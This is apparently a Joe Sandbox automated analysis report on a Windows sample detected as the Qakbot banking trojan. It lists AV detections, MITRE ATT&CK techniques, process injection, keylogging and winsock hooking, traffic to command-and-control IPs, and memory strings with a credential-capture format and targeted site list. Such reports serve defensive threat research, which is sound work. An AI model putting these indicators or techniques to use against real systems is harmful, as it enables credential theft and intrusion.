Play interactive tour

Edit tour

Analysis Report zhAQkCQvME

Overview

General Information

Joe Sandbox Version:	28.0.0 Lapis Lazuli
Analysis ID:	997215
Start date:	13.11.2019
Start time:	19:26:48
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 15m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	zhAQkCQvME (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	6
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.spyw.evad.winEXE@25/7@2/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 66.9% (good quality ratio 61.7%) Quality average: 77% Quality standard deviation: 31.8%
HCA Information:	Successful, ratio: 83% Number of executed functions: 255 Number of non-executed functions: 213
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe Excluded IPs from analysis (whitelisted): 93.184.221.240 Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu.wpc.apr-52dd2.edgecastdns.net, wu.azureedge.net Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found. Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy	Score	Range	Reporting	Whitelisted	Threat	Detection
Threshold	100	0 - 100	Report FP / FN	false	Qbot

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Contains functionality to modify the execution of threads in other processes

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook

Sample hooks winsock APIs (likely related to a banking trojan), analyze sample with the 'Check if internet explorer is infected by malware' cookbook

Sample is a service DLL but no service has been registered

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Valid Accounts1	Windows Management Instrumentation21	Registry Run Keys / Startup Folder1	Exploitation for Privilege Escalation1	Software Packing22	Network Sniffing1	System Time Discovery1	Remote File Copy2	Input Capture11	Data Encrypted11	Uncommonly Used Port1
Replication Through Removable Media	Execution through API1	Hooking21	Hooking21	Deobfuscate/Decode Files or Information1	Hooking21	Account Discovery1	Remote Services	Clipboard Data1	Exfiltration Over Other Network Medium	Remote File Copy2
Drive-by Compromise	Command-Line Interface1	Valid Accounts1	Valid Accounts1	Obfuscated Files or Information2	Input Capture11	Security Software Discovery341	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Standard Cryptographic Protocol22
Exploit Public-Facing Application	Service Execution2	Scheduled Task1	Access Token Manipulation11	Rootkit2	Credentials in Files	File and Directory Discovery1	Logon Scripts	Input Capture	Data Encrypted	Standard Non-Application Layer Protocol3
Spearphishing Link	Scheduled Task1	Modify Existing Service1	Process Injection711	Valid Accounts1	Account Manipulation	Network Sniffing1	Shared Webroot	Data Staged	Scheduled Transfer	Standard Application Layer Protocol13
Spearphishing Attachment	Graphical User Interface	New Service3	Scheduled Task1	Access Token Manipulation11	Brute Force	System Information Discovery35	Third-party Software	Screen Capture	Data Transfer Size Limits	Commonly Used Port
Spearphishing via Service	Scripting	Path Interception	New Service3	Process Injection711	Two-Factor Authentication Interception	Network Share Discovery1	Pass the Hash	Email Collection	Exfiltration Over Command and Control Channel	Uncommonly Used Port
Supply Chain Compromise	Third-party Software	Logon Scripts	Process Injection	Indicator Blocking	Bash History	Query Registry1	Remote Desktop Protocol	Clipboard Data	Exfiltration Over Alternative Protocol	Standard Application Layer Protocol
Trusted Relationship	Rundll32	DLL Search Order Hijacking	Service Registry Permissions Weakness	Process Injection	Input Prompt	Process Discovery4	Windows Admin Shares	Automated Collection	Exfiltration Over Physical Medium	Multilayer Encryption
Hardware Additions	PowerShell	Change Default File Association	Exploitation for Privilege Escalation	Scripting	Keychain	System Owner/User Discovery1	Taint Shared Content	Audio Capture		Connection Proxy
	Execution through API	File System Permissions Weakness	Valid Accounts	Indicator Removal from Tools	Private Keys	Remote System Discovery11	Replication Through Removable Media	Video Capture		Communication Through Removable Media
	Regsvr32	New Service	Bypass User Account Control	Indicator Removal on Host	Securityd Memory	System Network Configuration Discovery2	Pass the Ticket	Man in the Browser		Custom Command and Control Protocol

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus or Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Avira: detection malicious, Label: TR/Crypt.ZPACK.hfoah
Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for sample

Show sources

Source: zhAQkCQvME.exe	Avira: detection malicious, Label: TR/Crypt.ZPACK.hfoah
Source: zhAQkCQvME.exe	Joe Sandbox ML: detected

Genetic Malware detection for sample

Show sources

Source: zhAQkCQvME.exe

Intezer: detection malicious, Label: Qakbot

Perma Link

Genetic detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe

Intezer: detection malicious, Label: Qakbot

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: zhAQkCQvME.exe

Virustotal: Detection: 76%

Perma Link

Antivirus or Machine Learning detection for unpacked file

Show sources

Source: 18.0.jkfkdm.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.hfoah
Source: 12.2.explorer.exe.3f0000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 17.0.jkfkdm.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.hfoah
Source: 5.0.zhAQkCQvME.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.hfoah
Source: 14.2.jkfkdm.exe.400000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 7.0.jkfkdm.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.hfoah
Source: 7.2.jkfkdm.exe.400000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 2.0.jkfkdm.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.hfoah
Source: 1.0.zhAQkCQvME.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.hfoah
Source: 6.2.jkfkdm.exe.400000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 2.2.jkfkdm.exe.400000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 0.2.zhAQkCQvME.exe.400000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 5.2.zhAQkCQvME.exe.400000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 0.0.zhAQkCQvME.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.hfoah
Source: 14.0.jkfkdm.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.hfoah
Source: 18.2.jkfkdm.exe.400000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 1.2.zhAQkCQvME.exe.400000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 17.2.jkfkdm.exe.400000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 6.0.jkfkdm.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.hfoah

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\Windows\explorer.exe

Code function: 12_2_01510C9E CryptAcquireContextA,

12_2_01510C9E

Spreading:

Contains functionality to enumerate network shares

Show sources

Source: C:\Users\user\Desktop\zhAQkCQvME.exe	Code function: 0_2_00410BA0 NetUserEnum,LookupAccountNameW,LookupAccountNameW,Sleep,NetApiBufferFree,		0_2_00410BA0
Source: C:\Windows\explorer.exe	Code function: 12_2_00400BA0 NetUserEnum,LookupAccountNameW,LookupAccountNameW,Sleep,NetApiBufferFree,		12_2_00400BA0

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Windows\explorer.exe

Code function: 12_2_0151B870 FindFirstFileW,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,

12_2_0151B870

Networking:

May check the online IP address of the machine

Show sources

Source: unknown

DNS query: name: www.ip-adress.com

Uses ping.exe to check the status of other devices and networks

Show sources

Source: unknown

Process created: C:\Windows\System32\PING.EXE ping.exe -n 6 127.0.0.1

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic

TCP traffic: 192.168.1.107:49161 -> 23.49.13.33:7000

IP address seen in connection with other malware

Show sources

Source: Joe Sandbox View

IP Address: 23.49.13.33 23.49.13.33

Internet Provider seen in connection with other malware

Show sources

Source: Joe Sandbox View

ASN Name: unknown unknown

JA3 SSL client fingerprint seen in connection with other malware

Show sources

Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View	JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoHost: www.ip-adress.comCache-Control: no-cache

Connects to IPs without corresponding DNS lookups

Show sources

Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 23.49.13.33
Source: unknown	TCP traffic detected without corresponding DNS query: 23.49.13.33
Source: unknown	TCP traffic detected without corresponding DNS query: 23.49.13.33
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 23.49.13.33
Source: unknown	TCP traffic detected without corresponding DNS query: 23.49.13.33
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 23.49.13.33
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 162.244.225.30
Source: unknown	TCP traffic detected without corresponding DNS query: 23.49.13.33
Source: unknown	TCP traffic detected without corresponding DNS query: 23.49.13.33

Downloads files

Show sources

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TM8F7R7G\Y0S5SGVE.htm

Jump to behavior

Downloads files from webservers via HTTP

Show sources

Source: global traffic

Found strings which match to known social media urls

Show sources

Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: <a href="https://www.facebook.com/whoisip" target="_blank">Visit ip-adress.com on Facebook</a> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: <aside class="share"><div class="shariff" data-button-style="standard" data-lang="en" data-services="facebook,twitter,googleplus"></div></aside><aside class="ad link no-label"> equals www.twitter.com (Twitter)
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: <p>Your IP is the network protocol in the background that helps you communicate online using websites, sending email, chatting on Facebook, and everything else requiring an Internet connection. An IP Address is required to connect to the Internet, and IP-Adress.com gives you the tools that can help you.</p> equals www.facebook.com (Facebook)
Source: taskhost.exe, 00000013.00000000.541041949.01510000.00000004.00000001.sdmp	String found in binary or memory: GMSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365!$ equals www.hotmail.com (Hotmail)
Source: dwm.exe, 00000015.00000002.761332062.01B70000.00000004.00000040.sdmp	String found in binary or memory: NTUSER.DAT<%02X>AVAST Softwarei3w1explorer.exef1DELETE.aniEND/ url=[%s] user=[%s] pass=[%s]LEFT10AvastObtainUserAgentString.lnkPR_SetError000comet.yahoo.com;.hiro.tv;safebrowsing.google.com;geo.query.yahoo.com;googleusercontent.com;salesforce.com;officeapps.live.com;storage.live.com;messenger.live.com;.twimg.com;api.skype.com;mail.google.com;.bing.com;playtoga.com;.mozilla.com;.mozilla.org;hotbar.com;lphbs.com;contacts.msn.com;search.msn.com;clients.mindbodyonline.com;loyaltyconnect.ihg.com;.amazonaws.com;audatexsolutions.com;mail.services.live.com;etsy.com;.king.com;phantomefx.com;facebook.com;.gator.com;doubleclick.;zango.com;180solutions.com;wildtangent.com;webhancer.com;tbreport.bellsouth.net;spamblockerutility.com;internet-optimizer.com;.adworldmedia.com;seekmo.com;r777r.info;sipuku.com;eorezo.com;newasp.com.cn;wpzkq.com;radialpoint.com;owlforce.com;.microsoft.com;localhost;127.0.0.1;securestudies.com;farmville.com;mybrowserbar.com;auditude.com;digitalmediacommunications.com;mapquest.com;kixeye.com;mysh
Source: dwm.exe, 00000015.00000002.761332062.01B70000.00000004.00000040.sdmp	String found in binary or memory: comet.yahoo.com;.hiro.tv;safebrowsing.google.com;geo.query.yahoo.com;googleusercontent.com;salesforce.com;officeapps.live.com;storage.live.com;messenger.live.com;.twimg.com;api.skype.com;mail.google.com;.bing.com;playtoga.com;.mozilla.com;.mozilla.org;hotbar.com;lphbs.com;contacts.msn.com;search.msn.com;clients.mindbodyonline.com;loyaltyconnect.ihg.com;.amazonaws.com;audatexsolutions.com;mail.services.live.com;etsy.com;.king.com;phantomefx.com;facebook.com;.gator.com;doubleclick.;zango.com;180solutions.com;wildtangent.com;webhancer.com;tbreport.bellsouth.net;spamblockerutility.com;internet-optimizer.com;.adworldmedia.com;seekmo.com;r777r.info;sipuku.com;eorezo.com;newasp.com.cn;wpzkq.com;radialpoint.com;owlforce.com;.microsoft.com;localhost;127.0.0.1;securestudies.com;farmville.com;mybrowserbar.com;auditude.com;digitalmediacommunications.com;mapquest.com;kixeye.com;myshopres.com;conduit-services.com;zynga.com;.5min.com;netflix.com;tubemogul.com;youtube.com;brightcove.com;mochibot.com;fwmrm.net;mendeley.com equ
Source: zhAQkCQvME.exe, 00000000.00000002.470959957.015D0000.00000004.00000040.sdmp, zhAQkCQvME.exe, 00000001.00000002.452348450.016D0000.00000004.00000040.sdmp, jkfkdm.exe, 00000002.00000002.487446283.01550000.00000004.00000040.sdmp, zhAQkCQvME.exe, 00000005.00000002.485333119.00AA0000.00000004.00000040.sdmp, jkfkdm.exe, 00000006.00000002.478496840.01600000.00000004.00000040.sdmp, jkfkdm.exe, 00000007.00000002.493272674.01630000.00000004.00000040.sdmp, explorer.exe, 0000000C.00000002.753873444.018E0000.00000004.00000040.sdmp, jkfkdm.exe, 0000000E.00000002.491326133.015A0000.00000004.00000040.sdmp, jkfkdm.exe, 00000011.00000002.518700844.016D0000.00000004.00000040.sdmp, jkfkdm.exe, 00000012.00000002.517136665.01490000.00000004.00000040.sdmp, taskhost.exe, 00000013.00000002.759522715.028D0000.00000004.00000040.sdmp, dwm.exe, 00000015.00000002.761332062.01B70000.00000004.00000040.sdmp	String found in binary or memory: facebook.com/login equals www.facebook.com (Facebook)
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: www.ip-adress.com

Urls found in memory or binary data

Show sources

Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp, taskhost.exe, 00000013.00000000.541041949.01510000.00000004.00000001.sdmp	String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: explorer.exe, 0000000C.00000003.528867765.024F6000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSADomainVal
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: explorer.exe, 0000000C.00000002.752804516.005A3000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000002.755364075.0247C000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5c237a5af5bbb
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjI2NTk3ZDdlZTYwMzFkMzk0ODg0N2Q0ZDdjMDZhM2Y2NDM3M
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjdkZGUzNDRkMmI2YjI4YjRhM2YzOWRiOTcyMzY5Y2EzNzJlY
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk0Zjk4MDE0NWQzMTY4NzhkNWI2YjZhNDRlYTRiYTdlNzQ4O
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6ImMzZDkyYjY0ZGRiNGYzNjgwYTJjNTY2ZDdmOWEzMGUyZjdjY
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQzZDU5ZjFhY2VmYzk3ZDhjYTk4NDhmMDYwNjk1Y2JiMTA5Z
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE2MMBW?ver=870f
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE2MRl4?ver=1412
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE2MRl8?ver=7064
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE2MzIE?ver=198d
Source: taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	String found in binary or memory: http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE2MzIH?ver=cc00
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE2MzIm?ver=d018
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA7XCQ3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAFvutY?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHtTgs?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHtYkG?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHtrJ1?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHuD5P?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHuFNw?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHucYP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHudP8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHudWM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHuzRp?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHv5DU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHv9aU?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhost.exe, 00000013.00000000.536034759.00490000.00000004.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHvWgM?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHvXhQ?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHvaL6?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHvwNG?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHwCff?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHwESx?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHwGur?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhost.exe, 00000013.00000000.536786673.015C8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHwOoE?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: taskhost.exe, 00000013.00000000.546269969.01BD8000.00000008.00000001.sdmp	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHwR4s?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
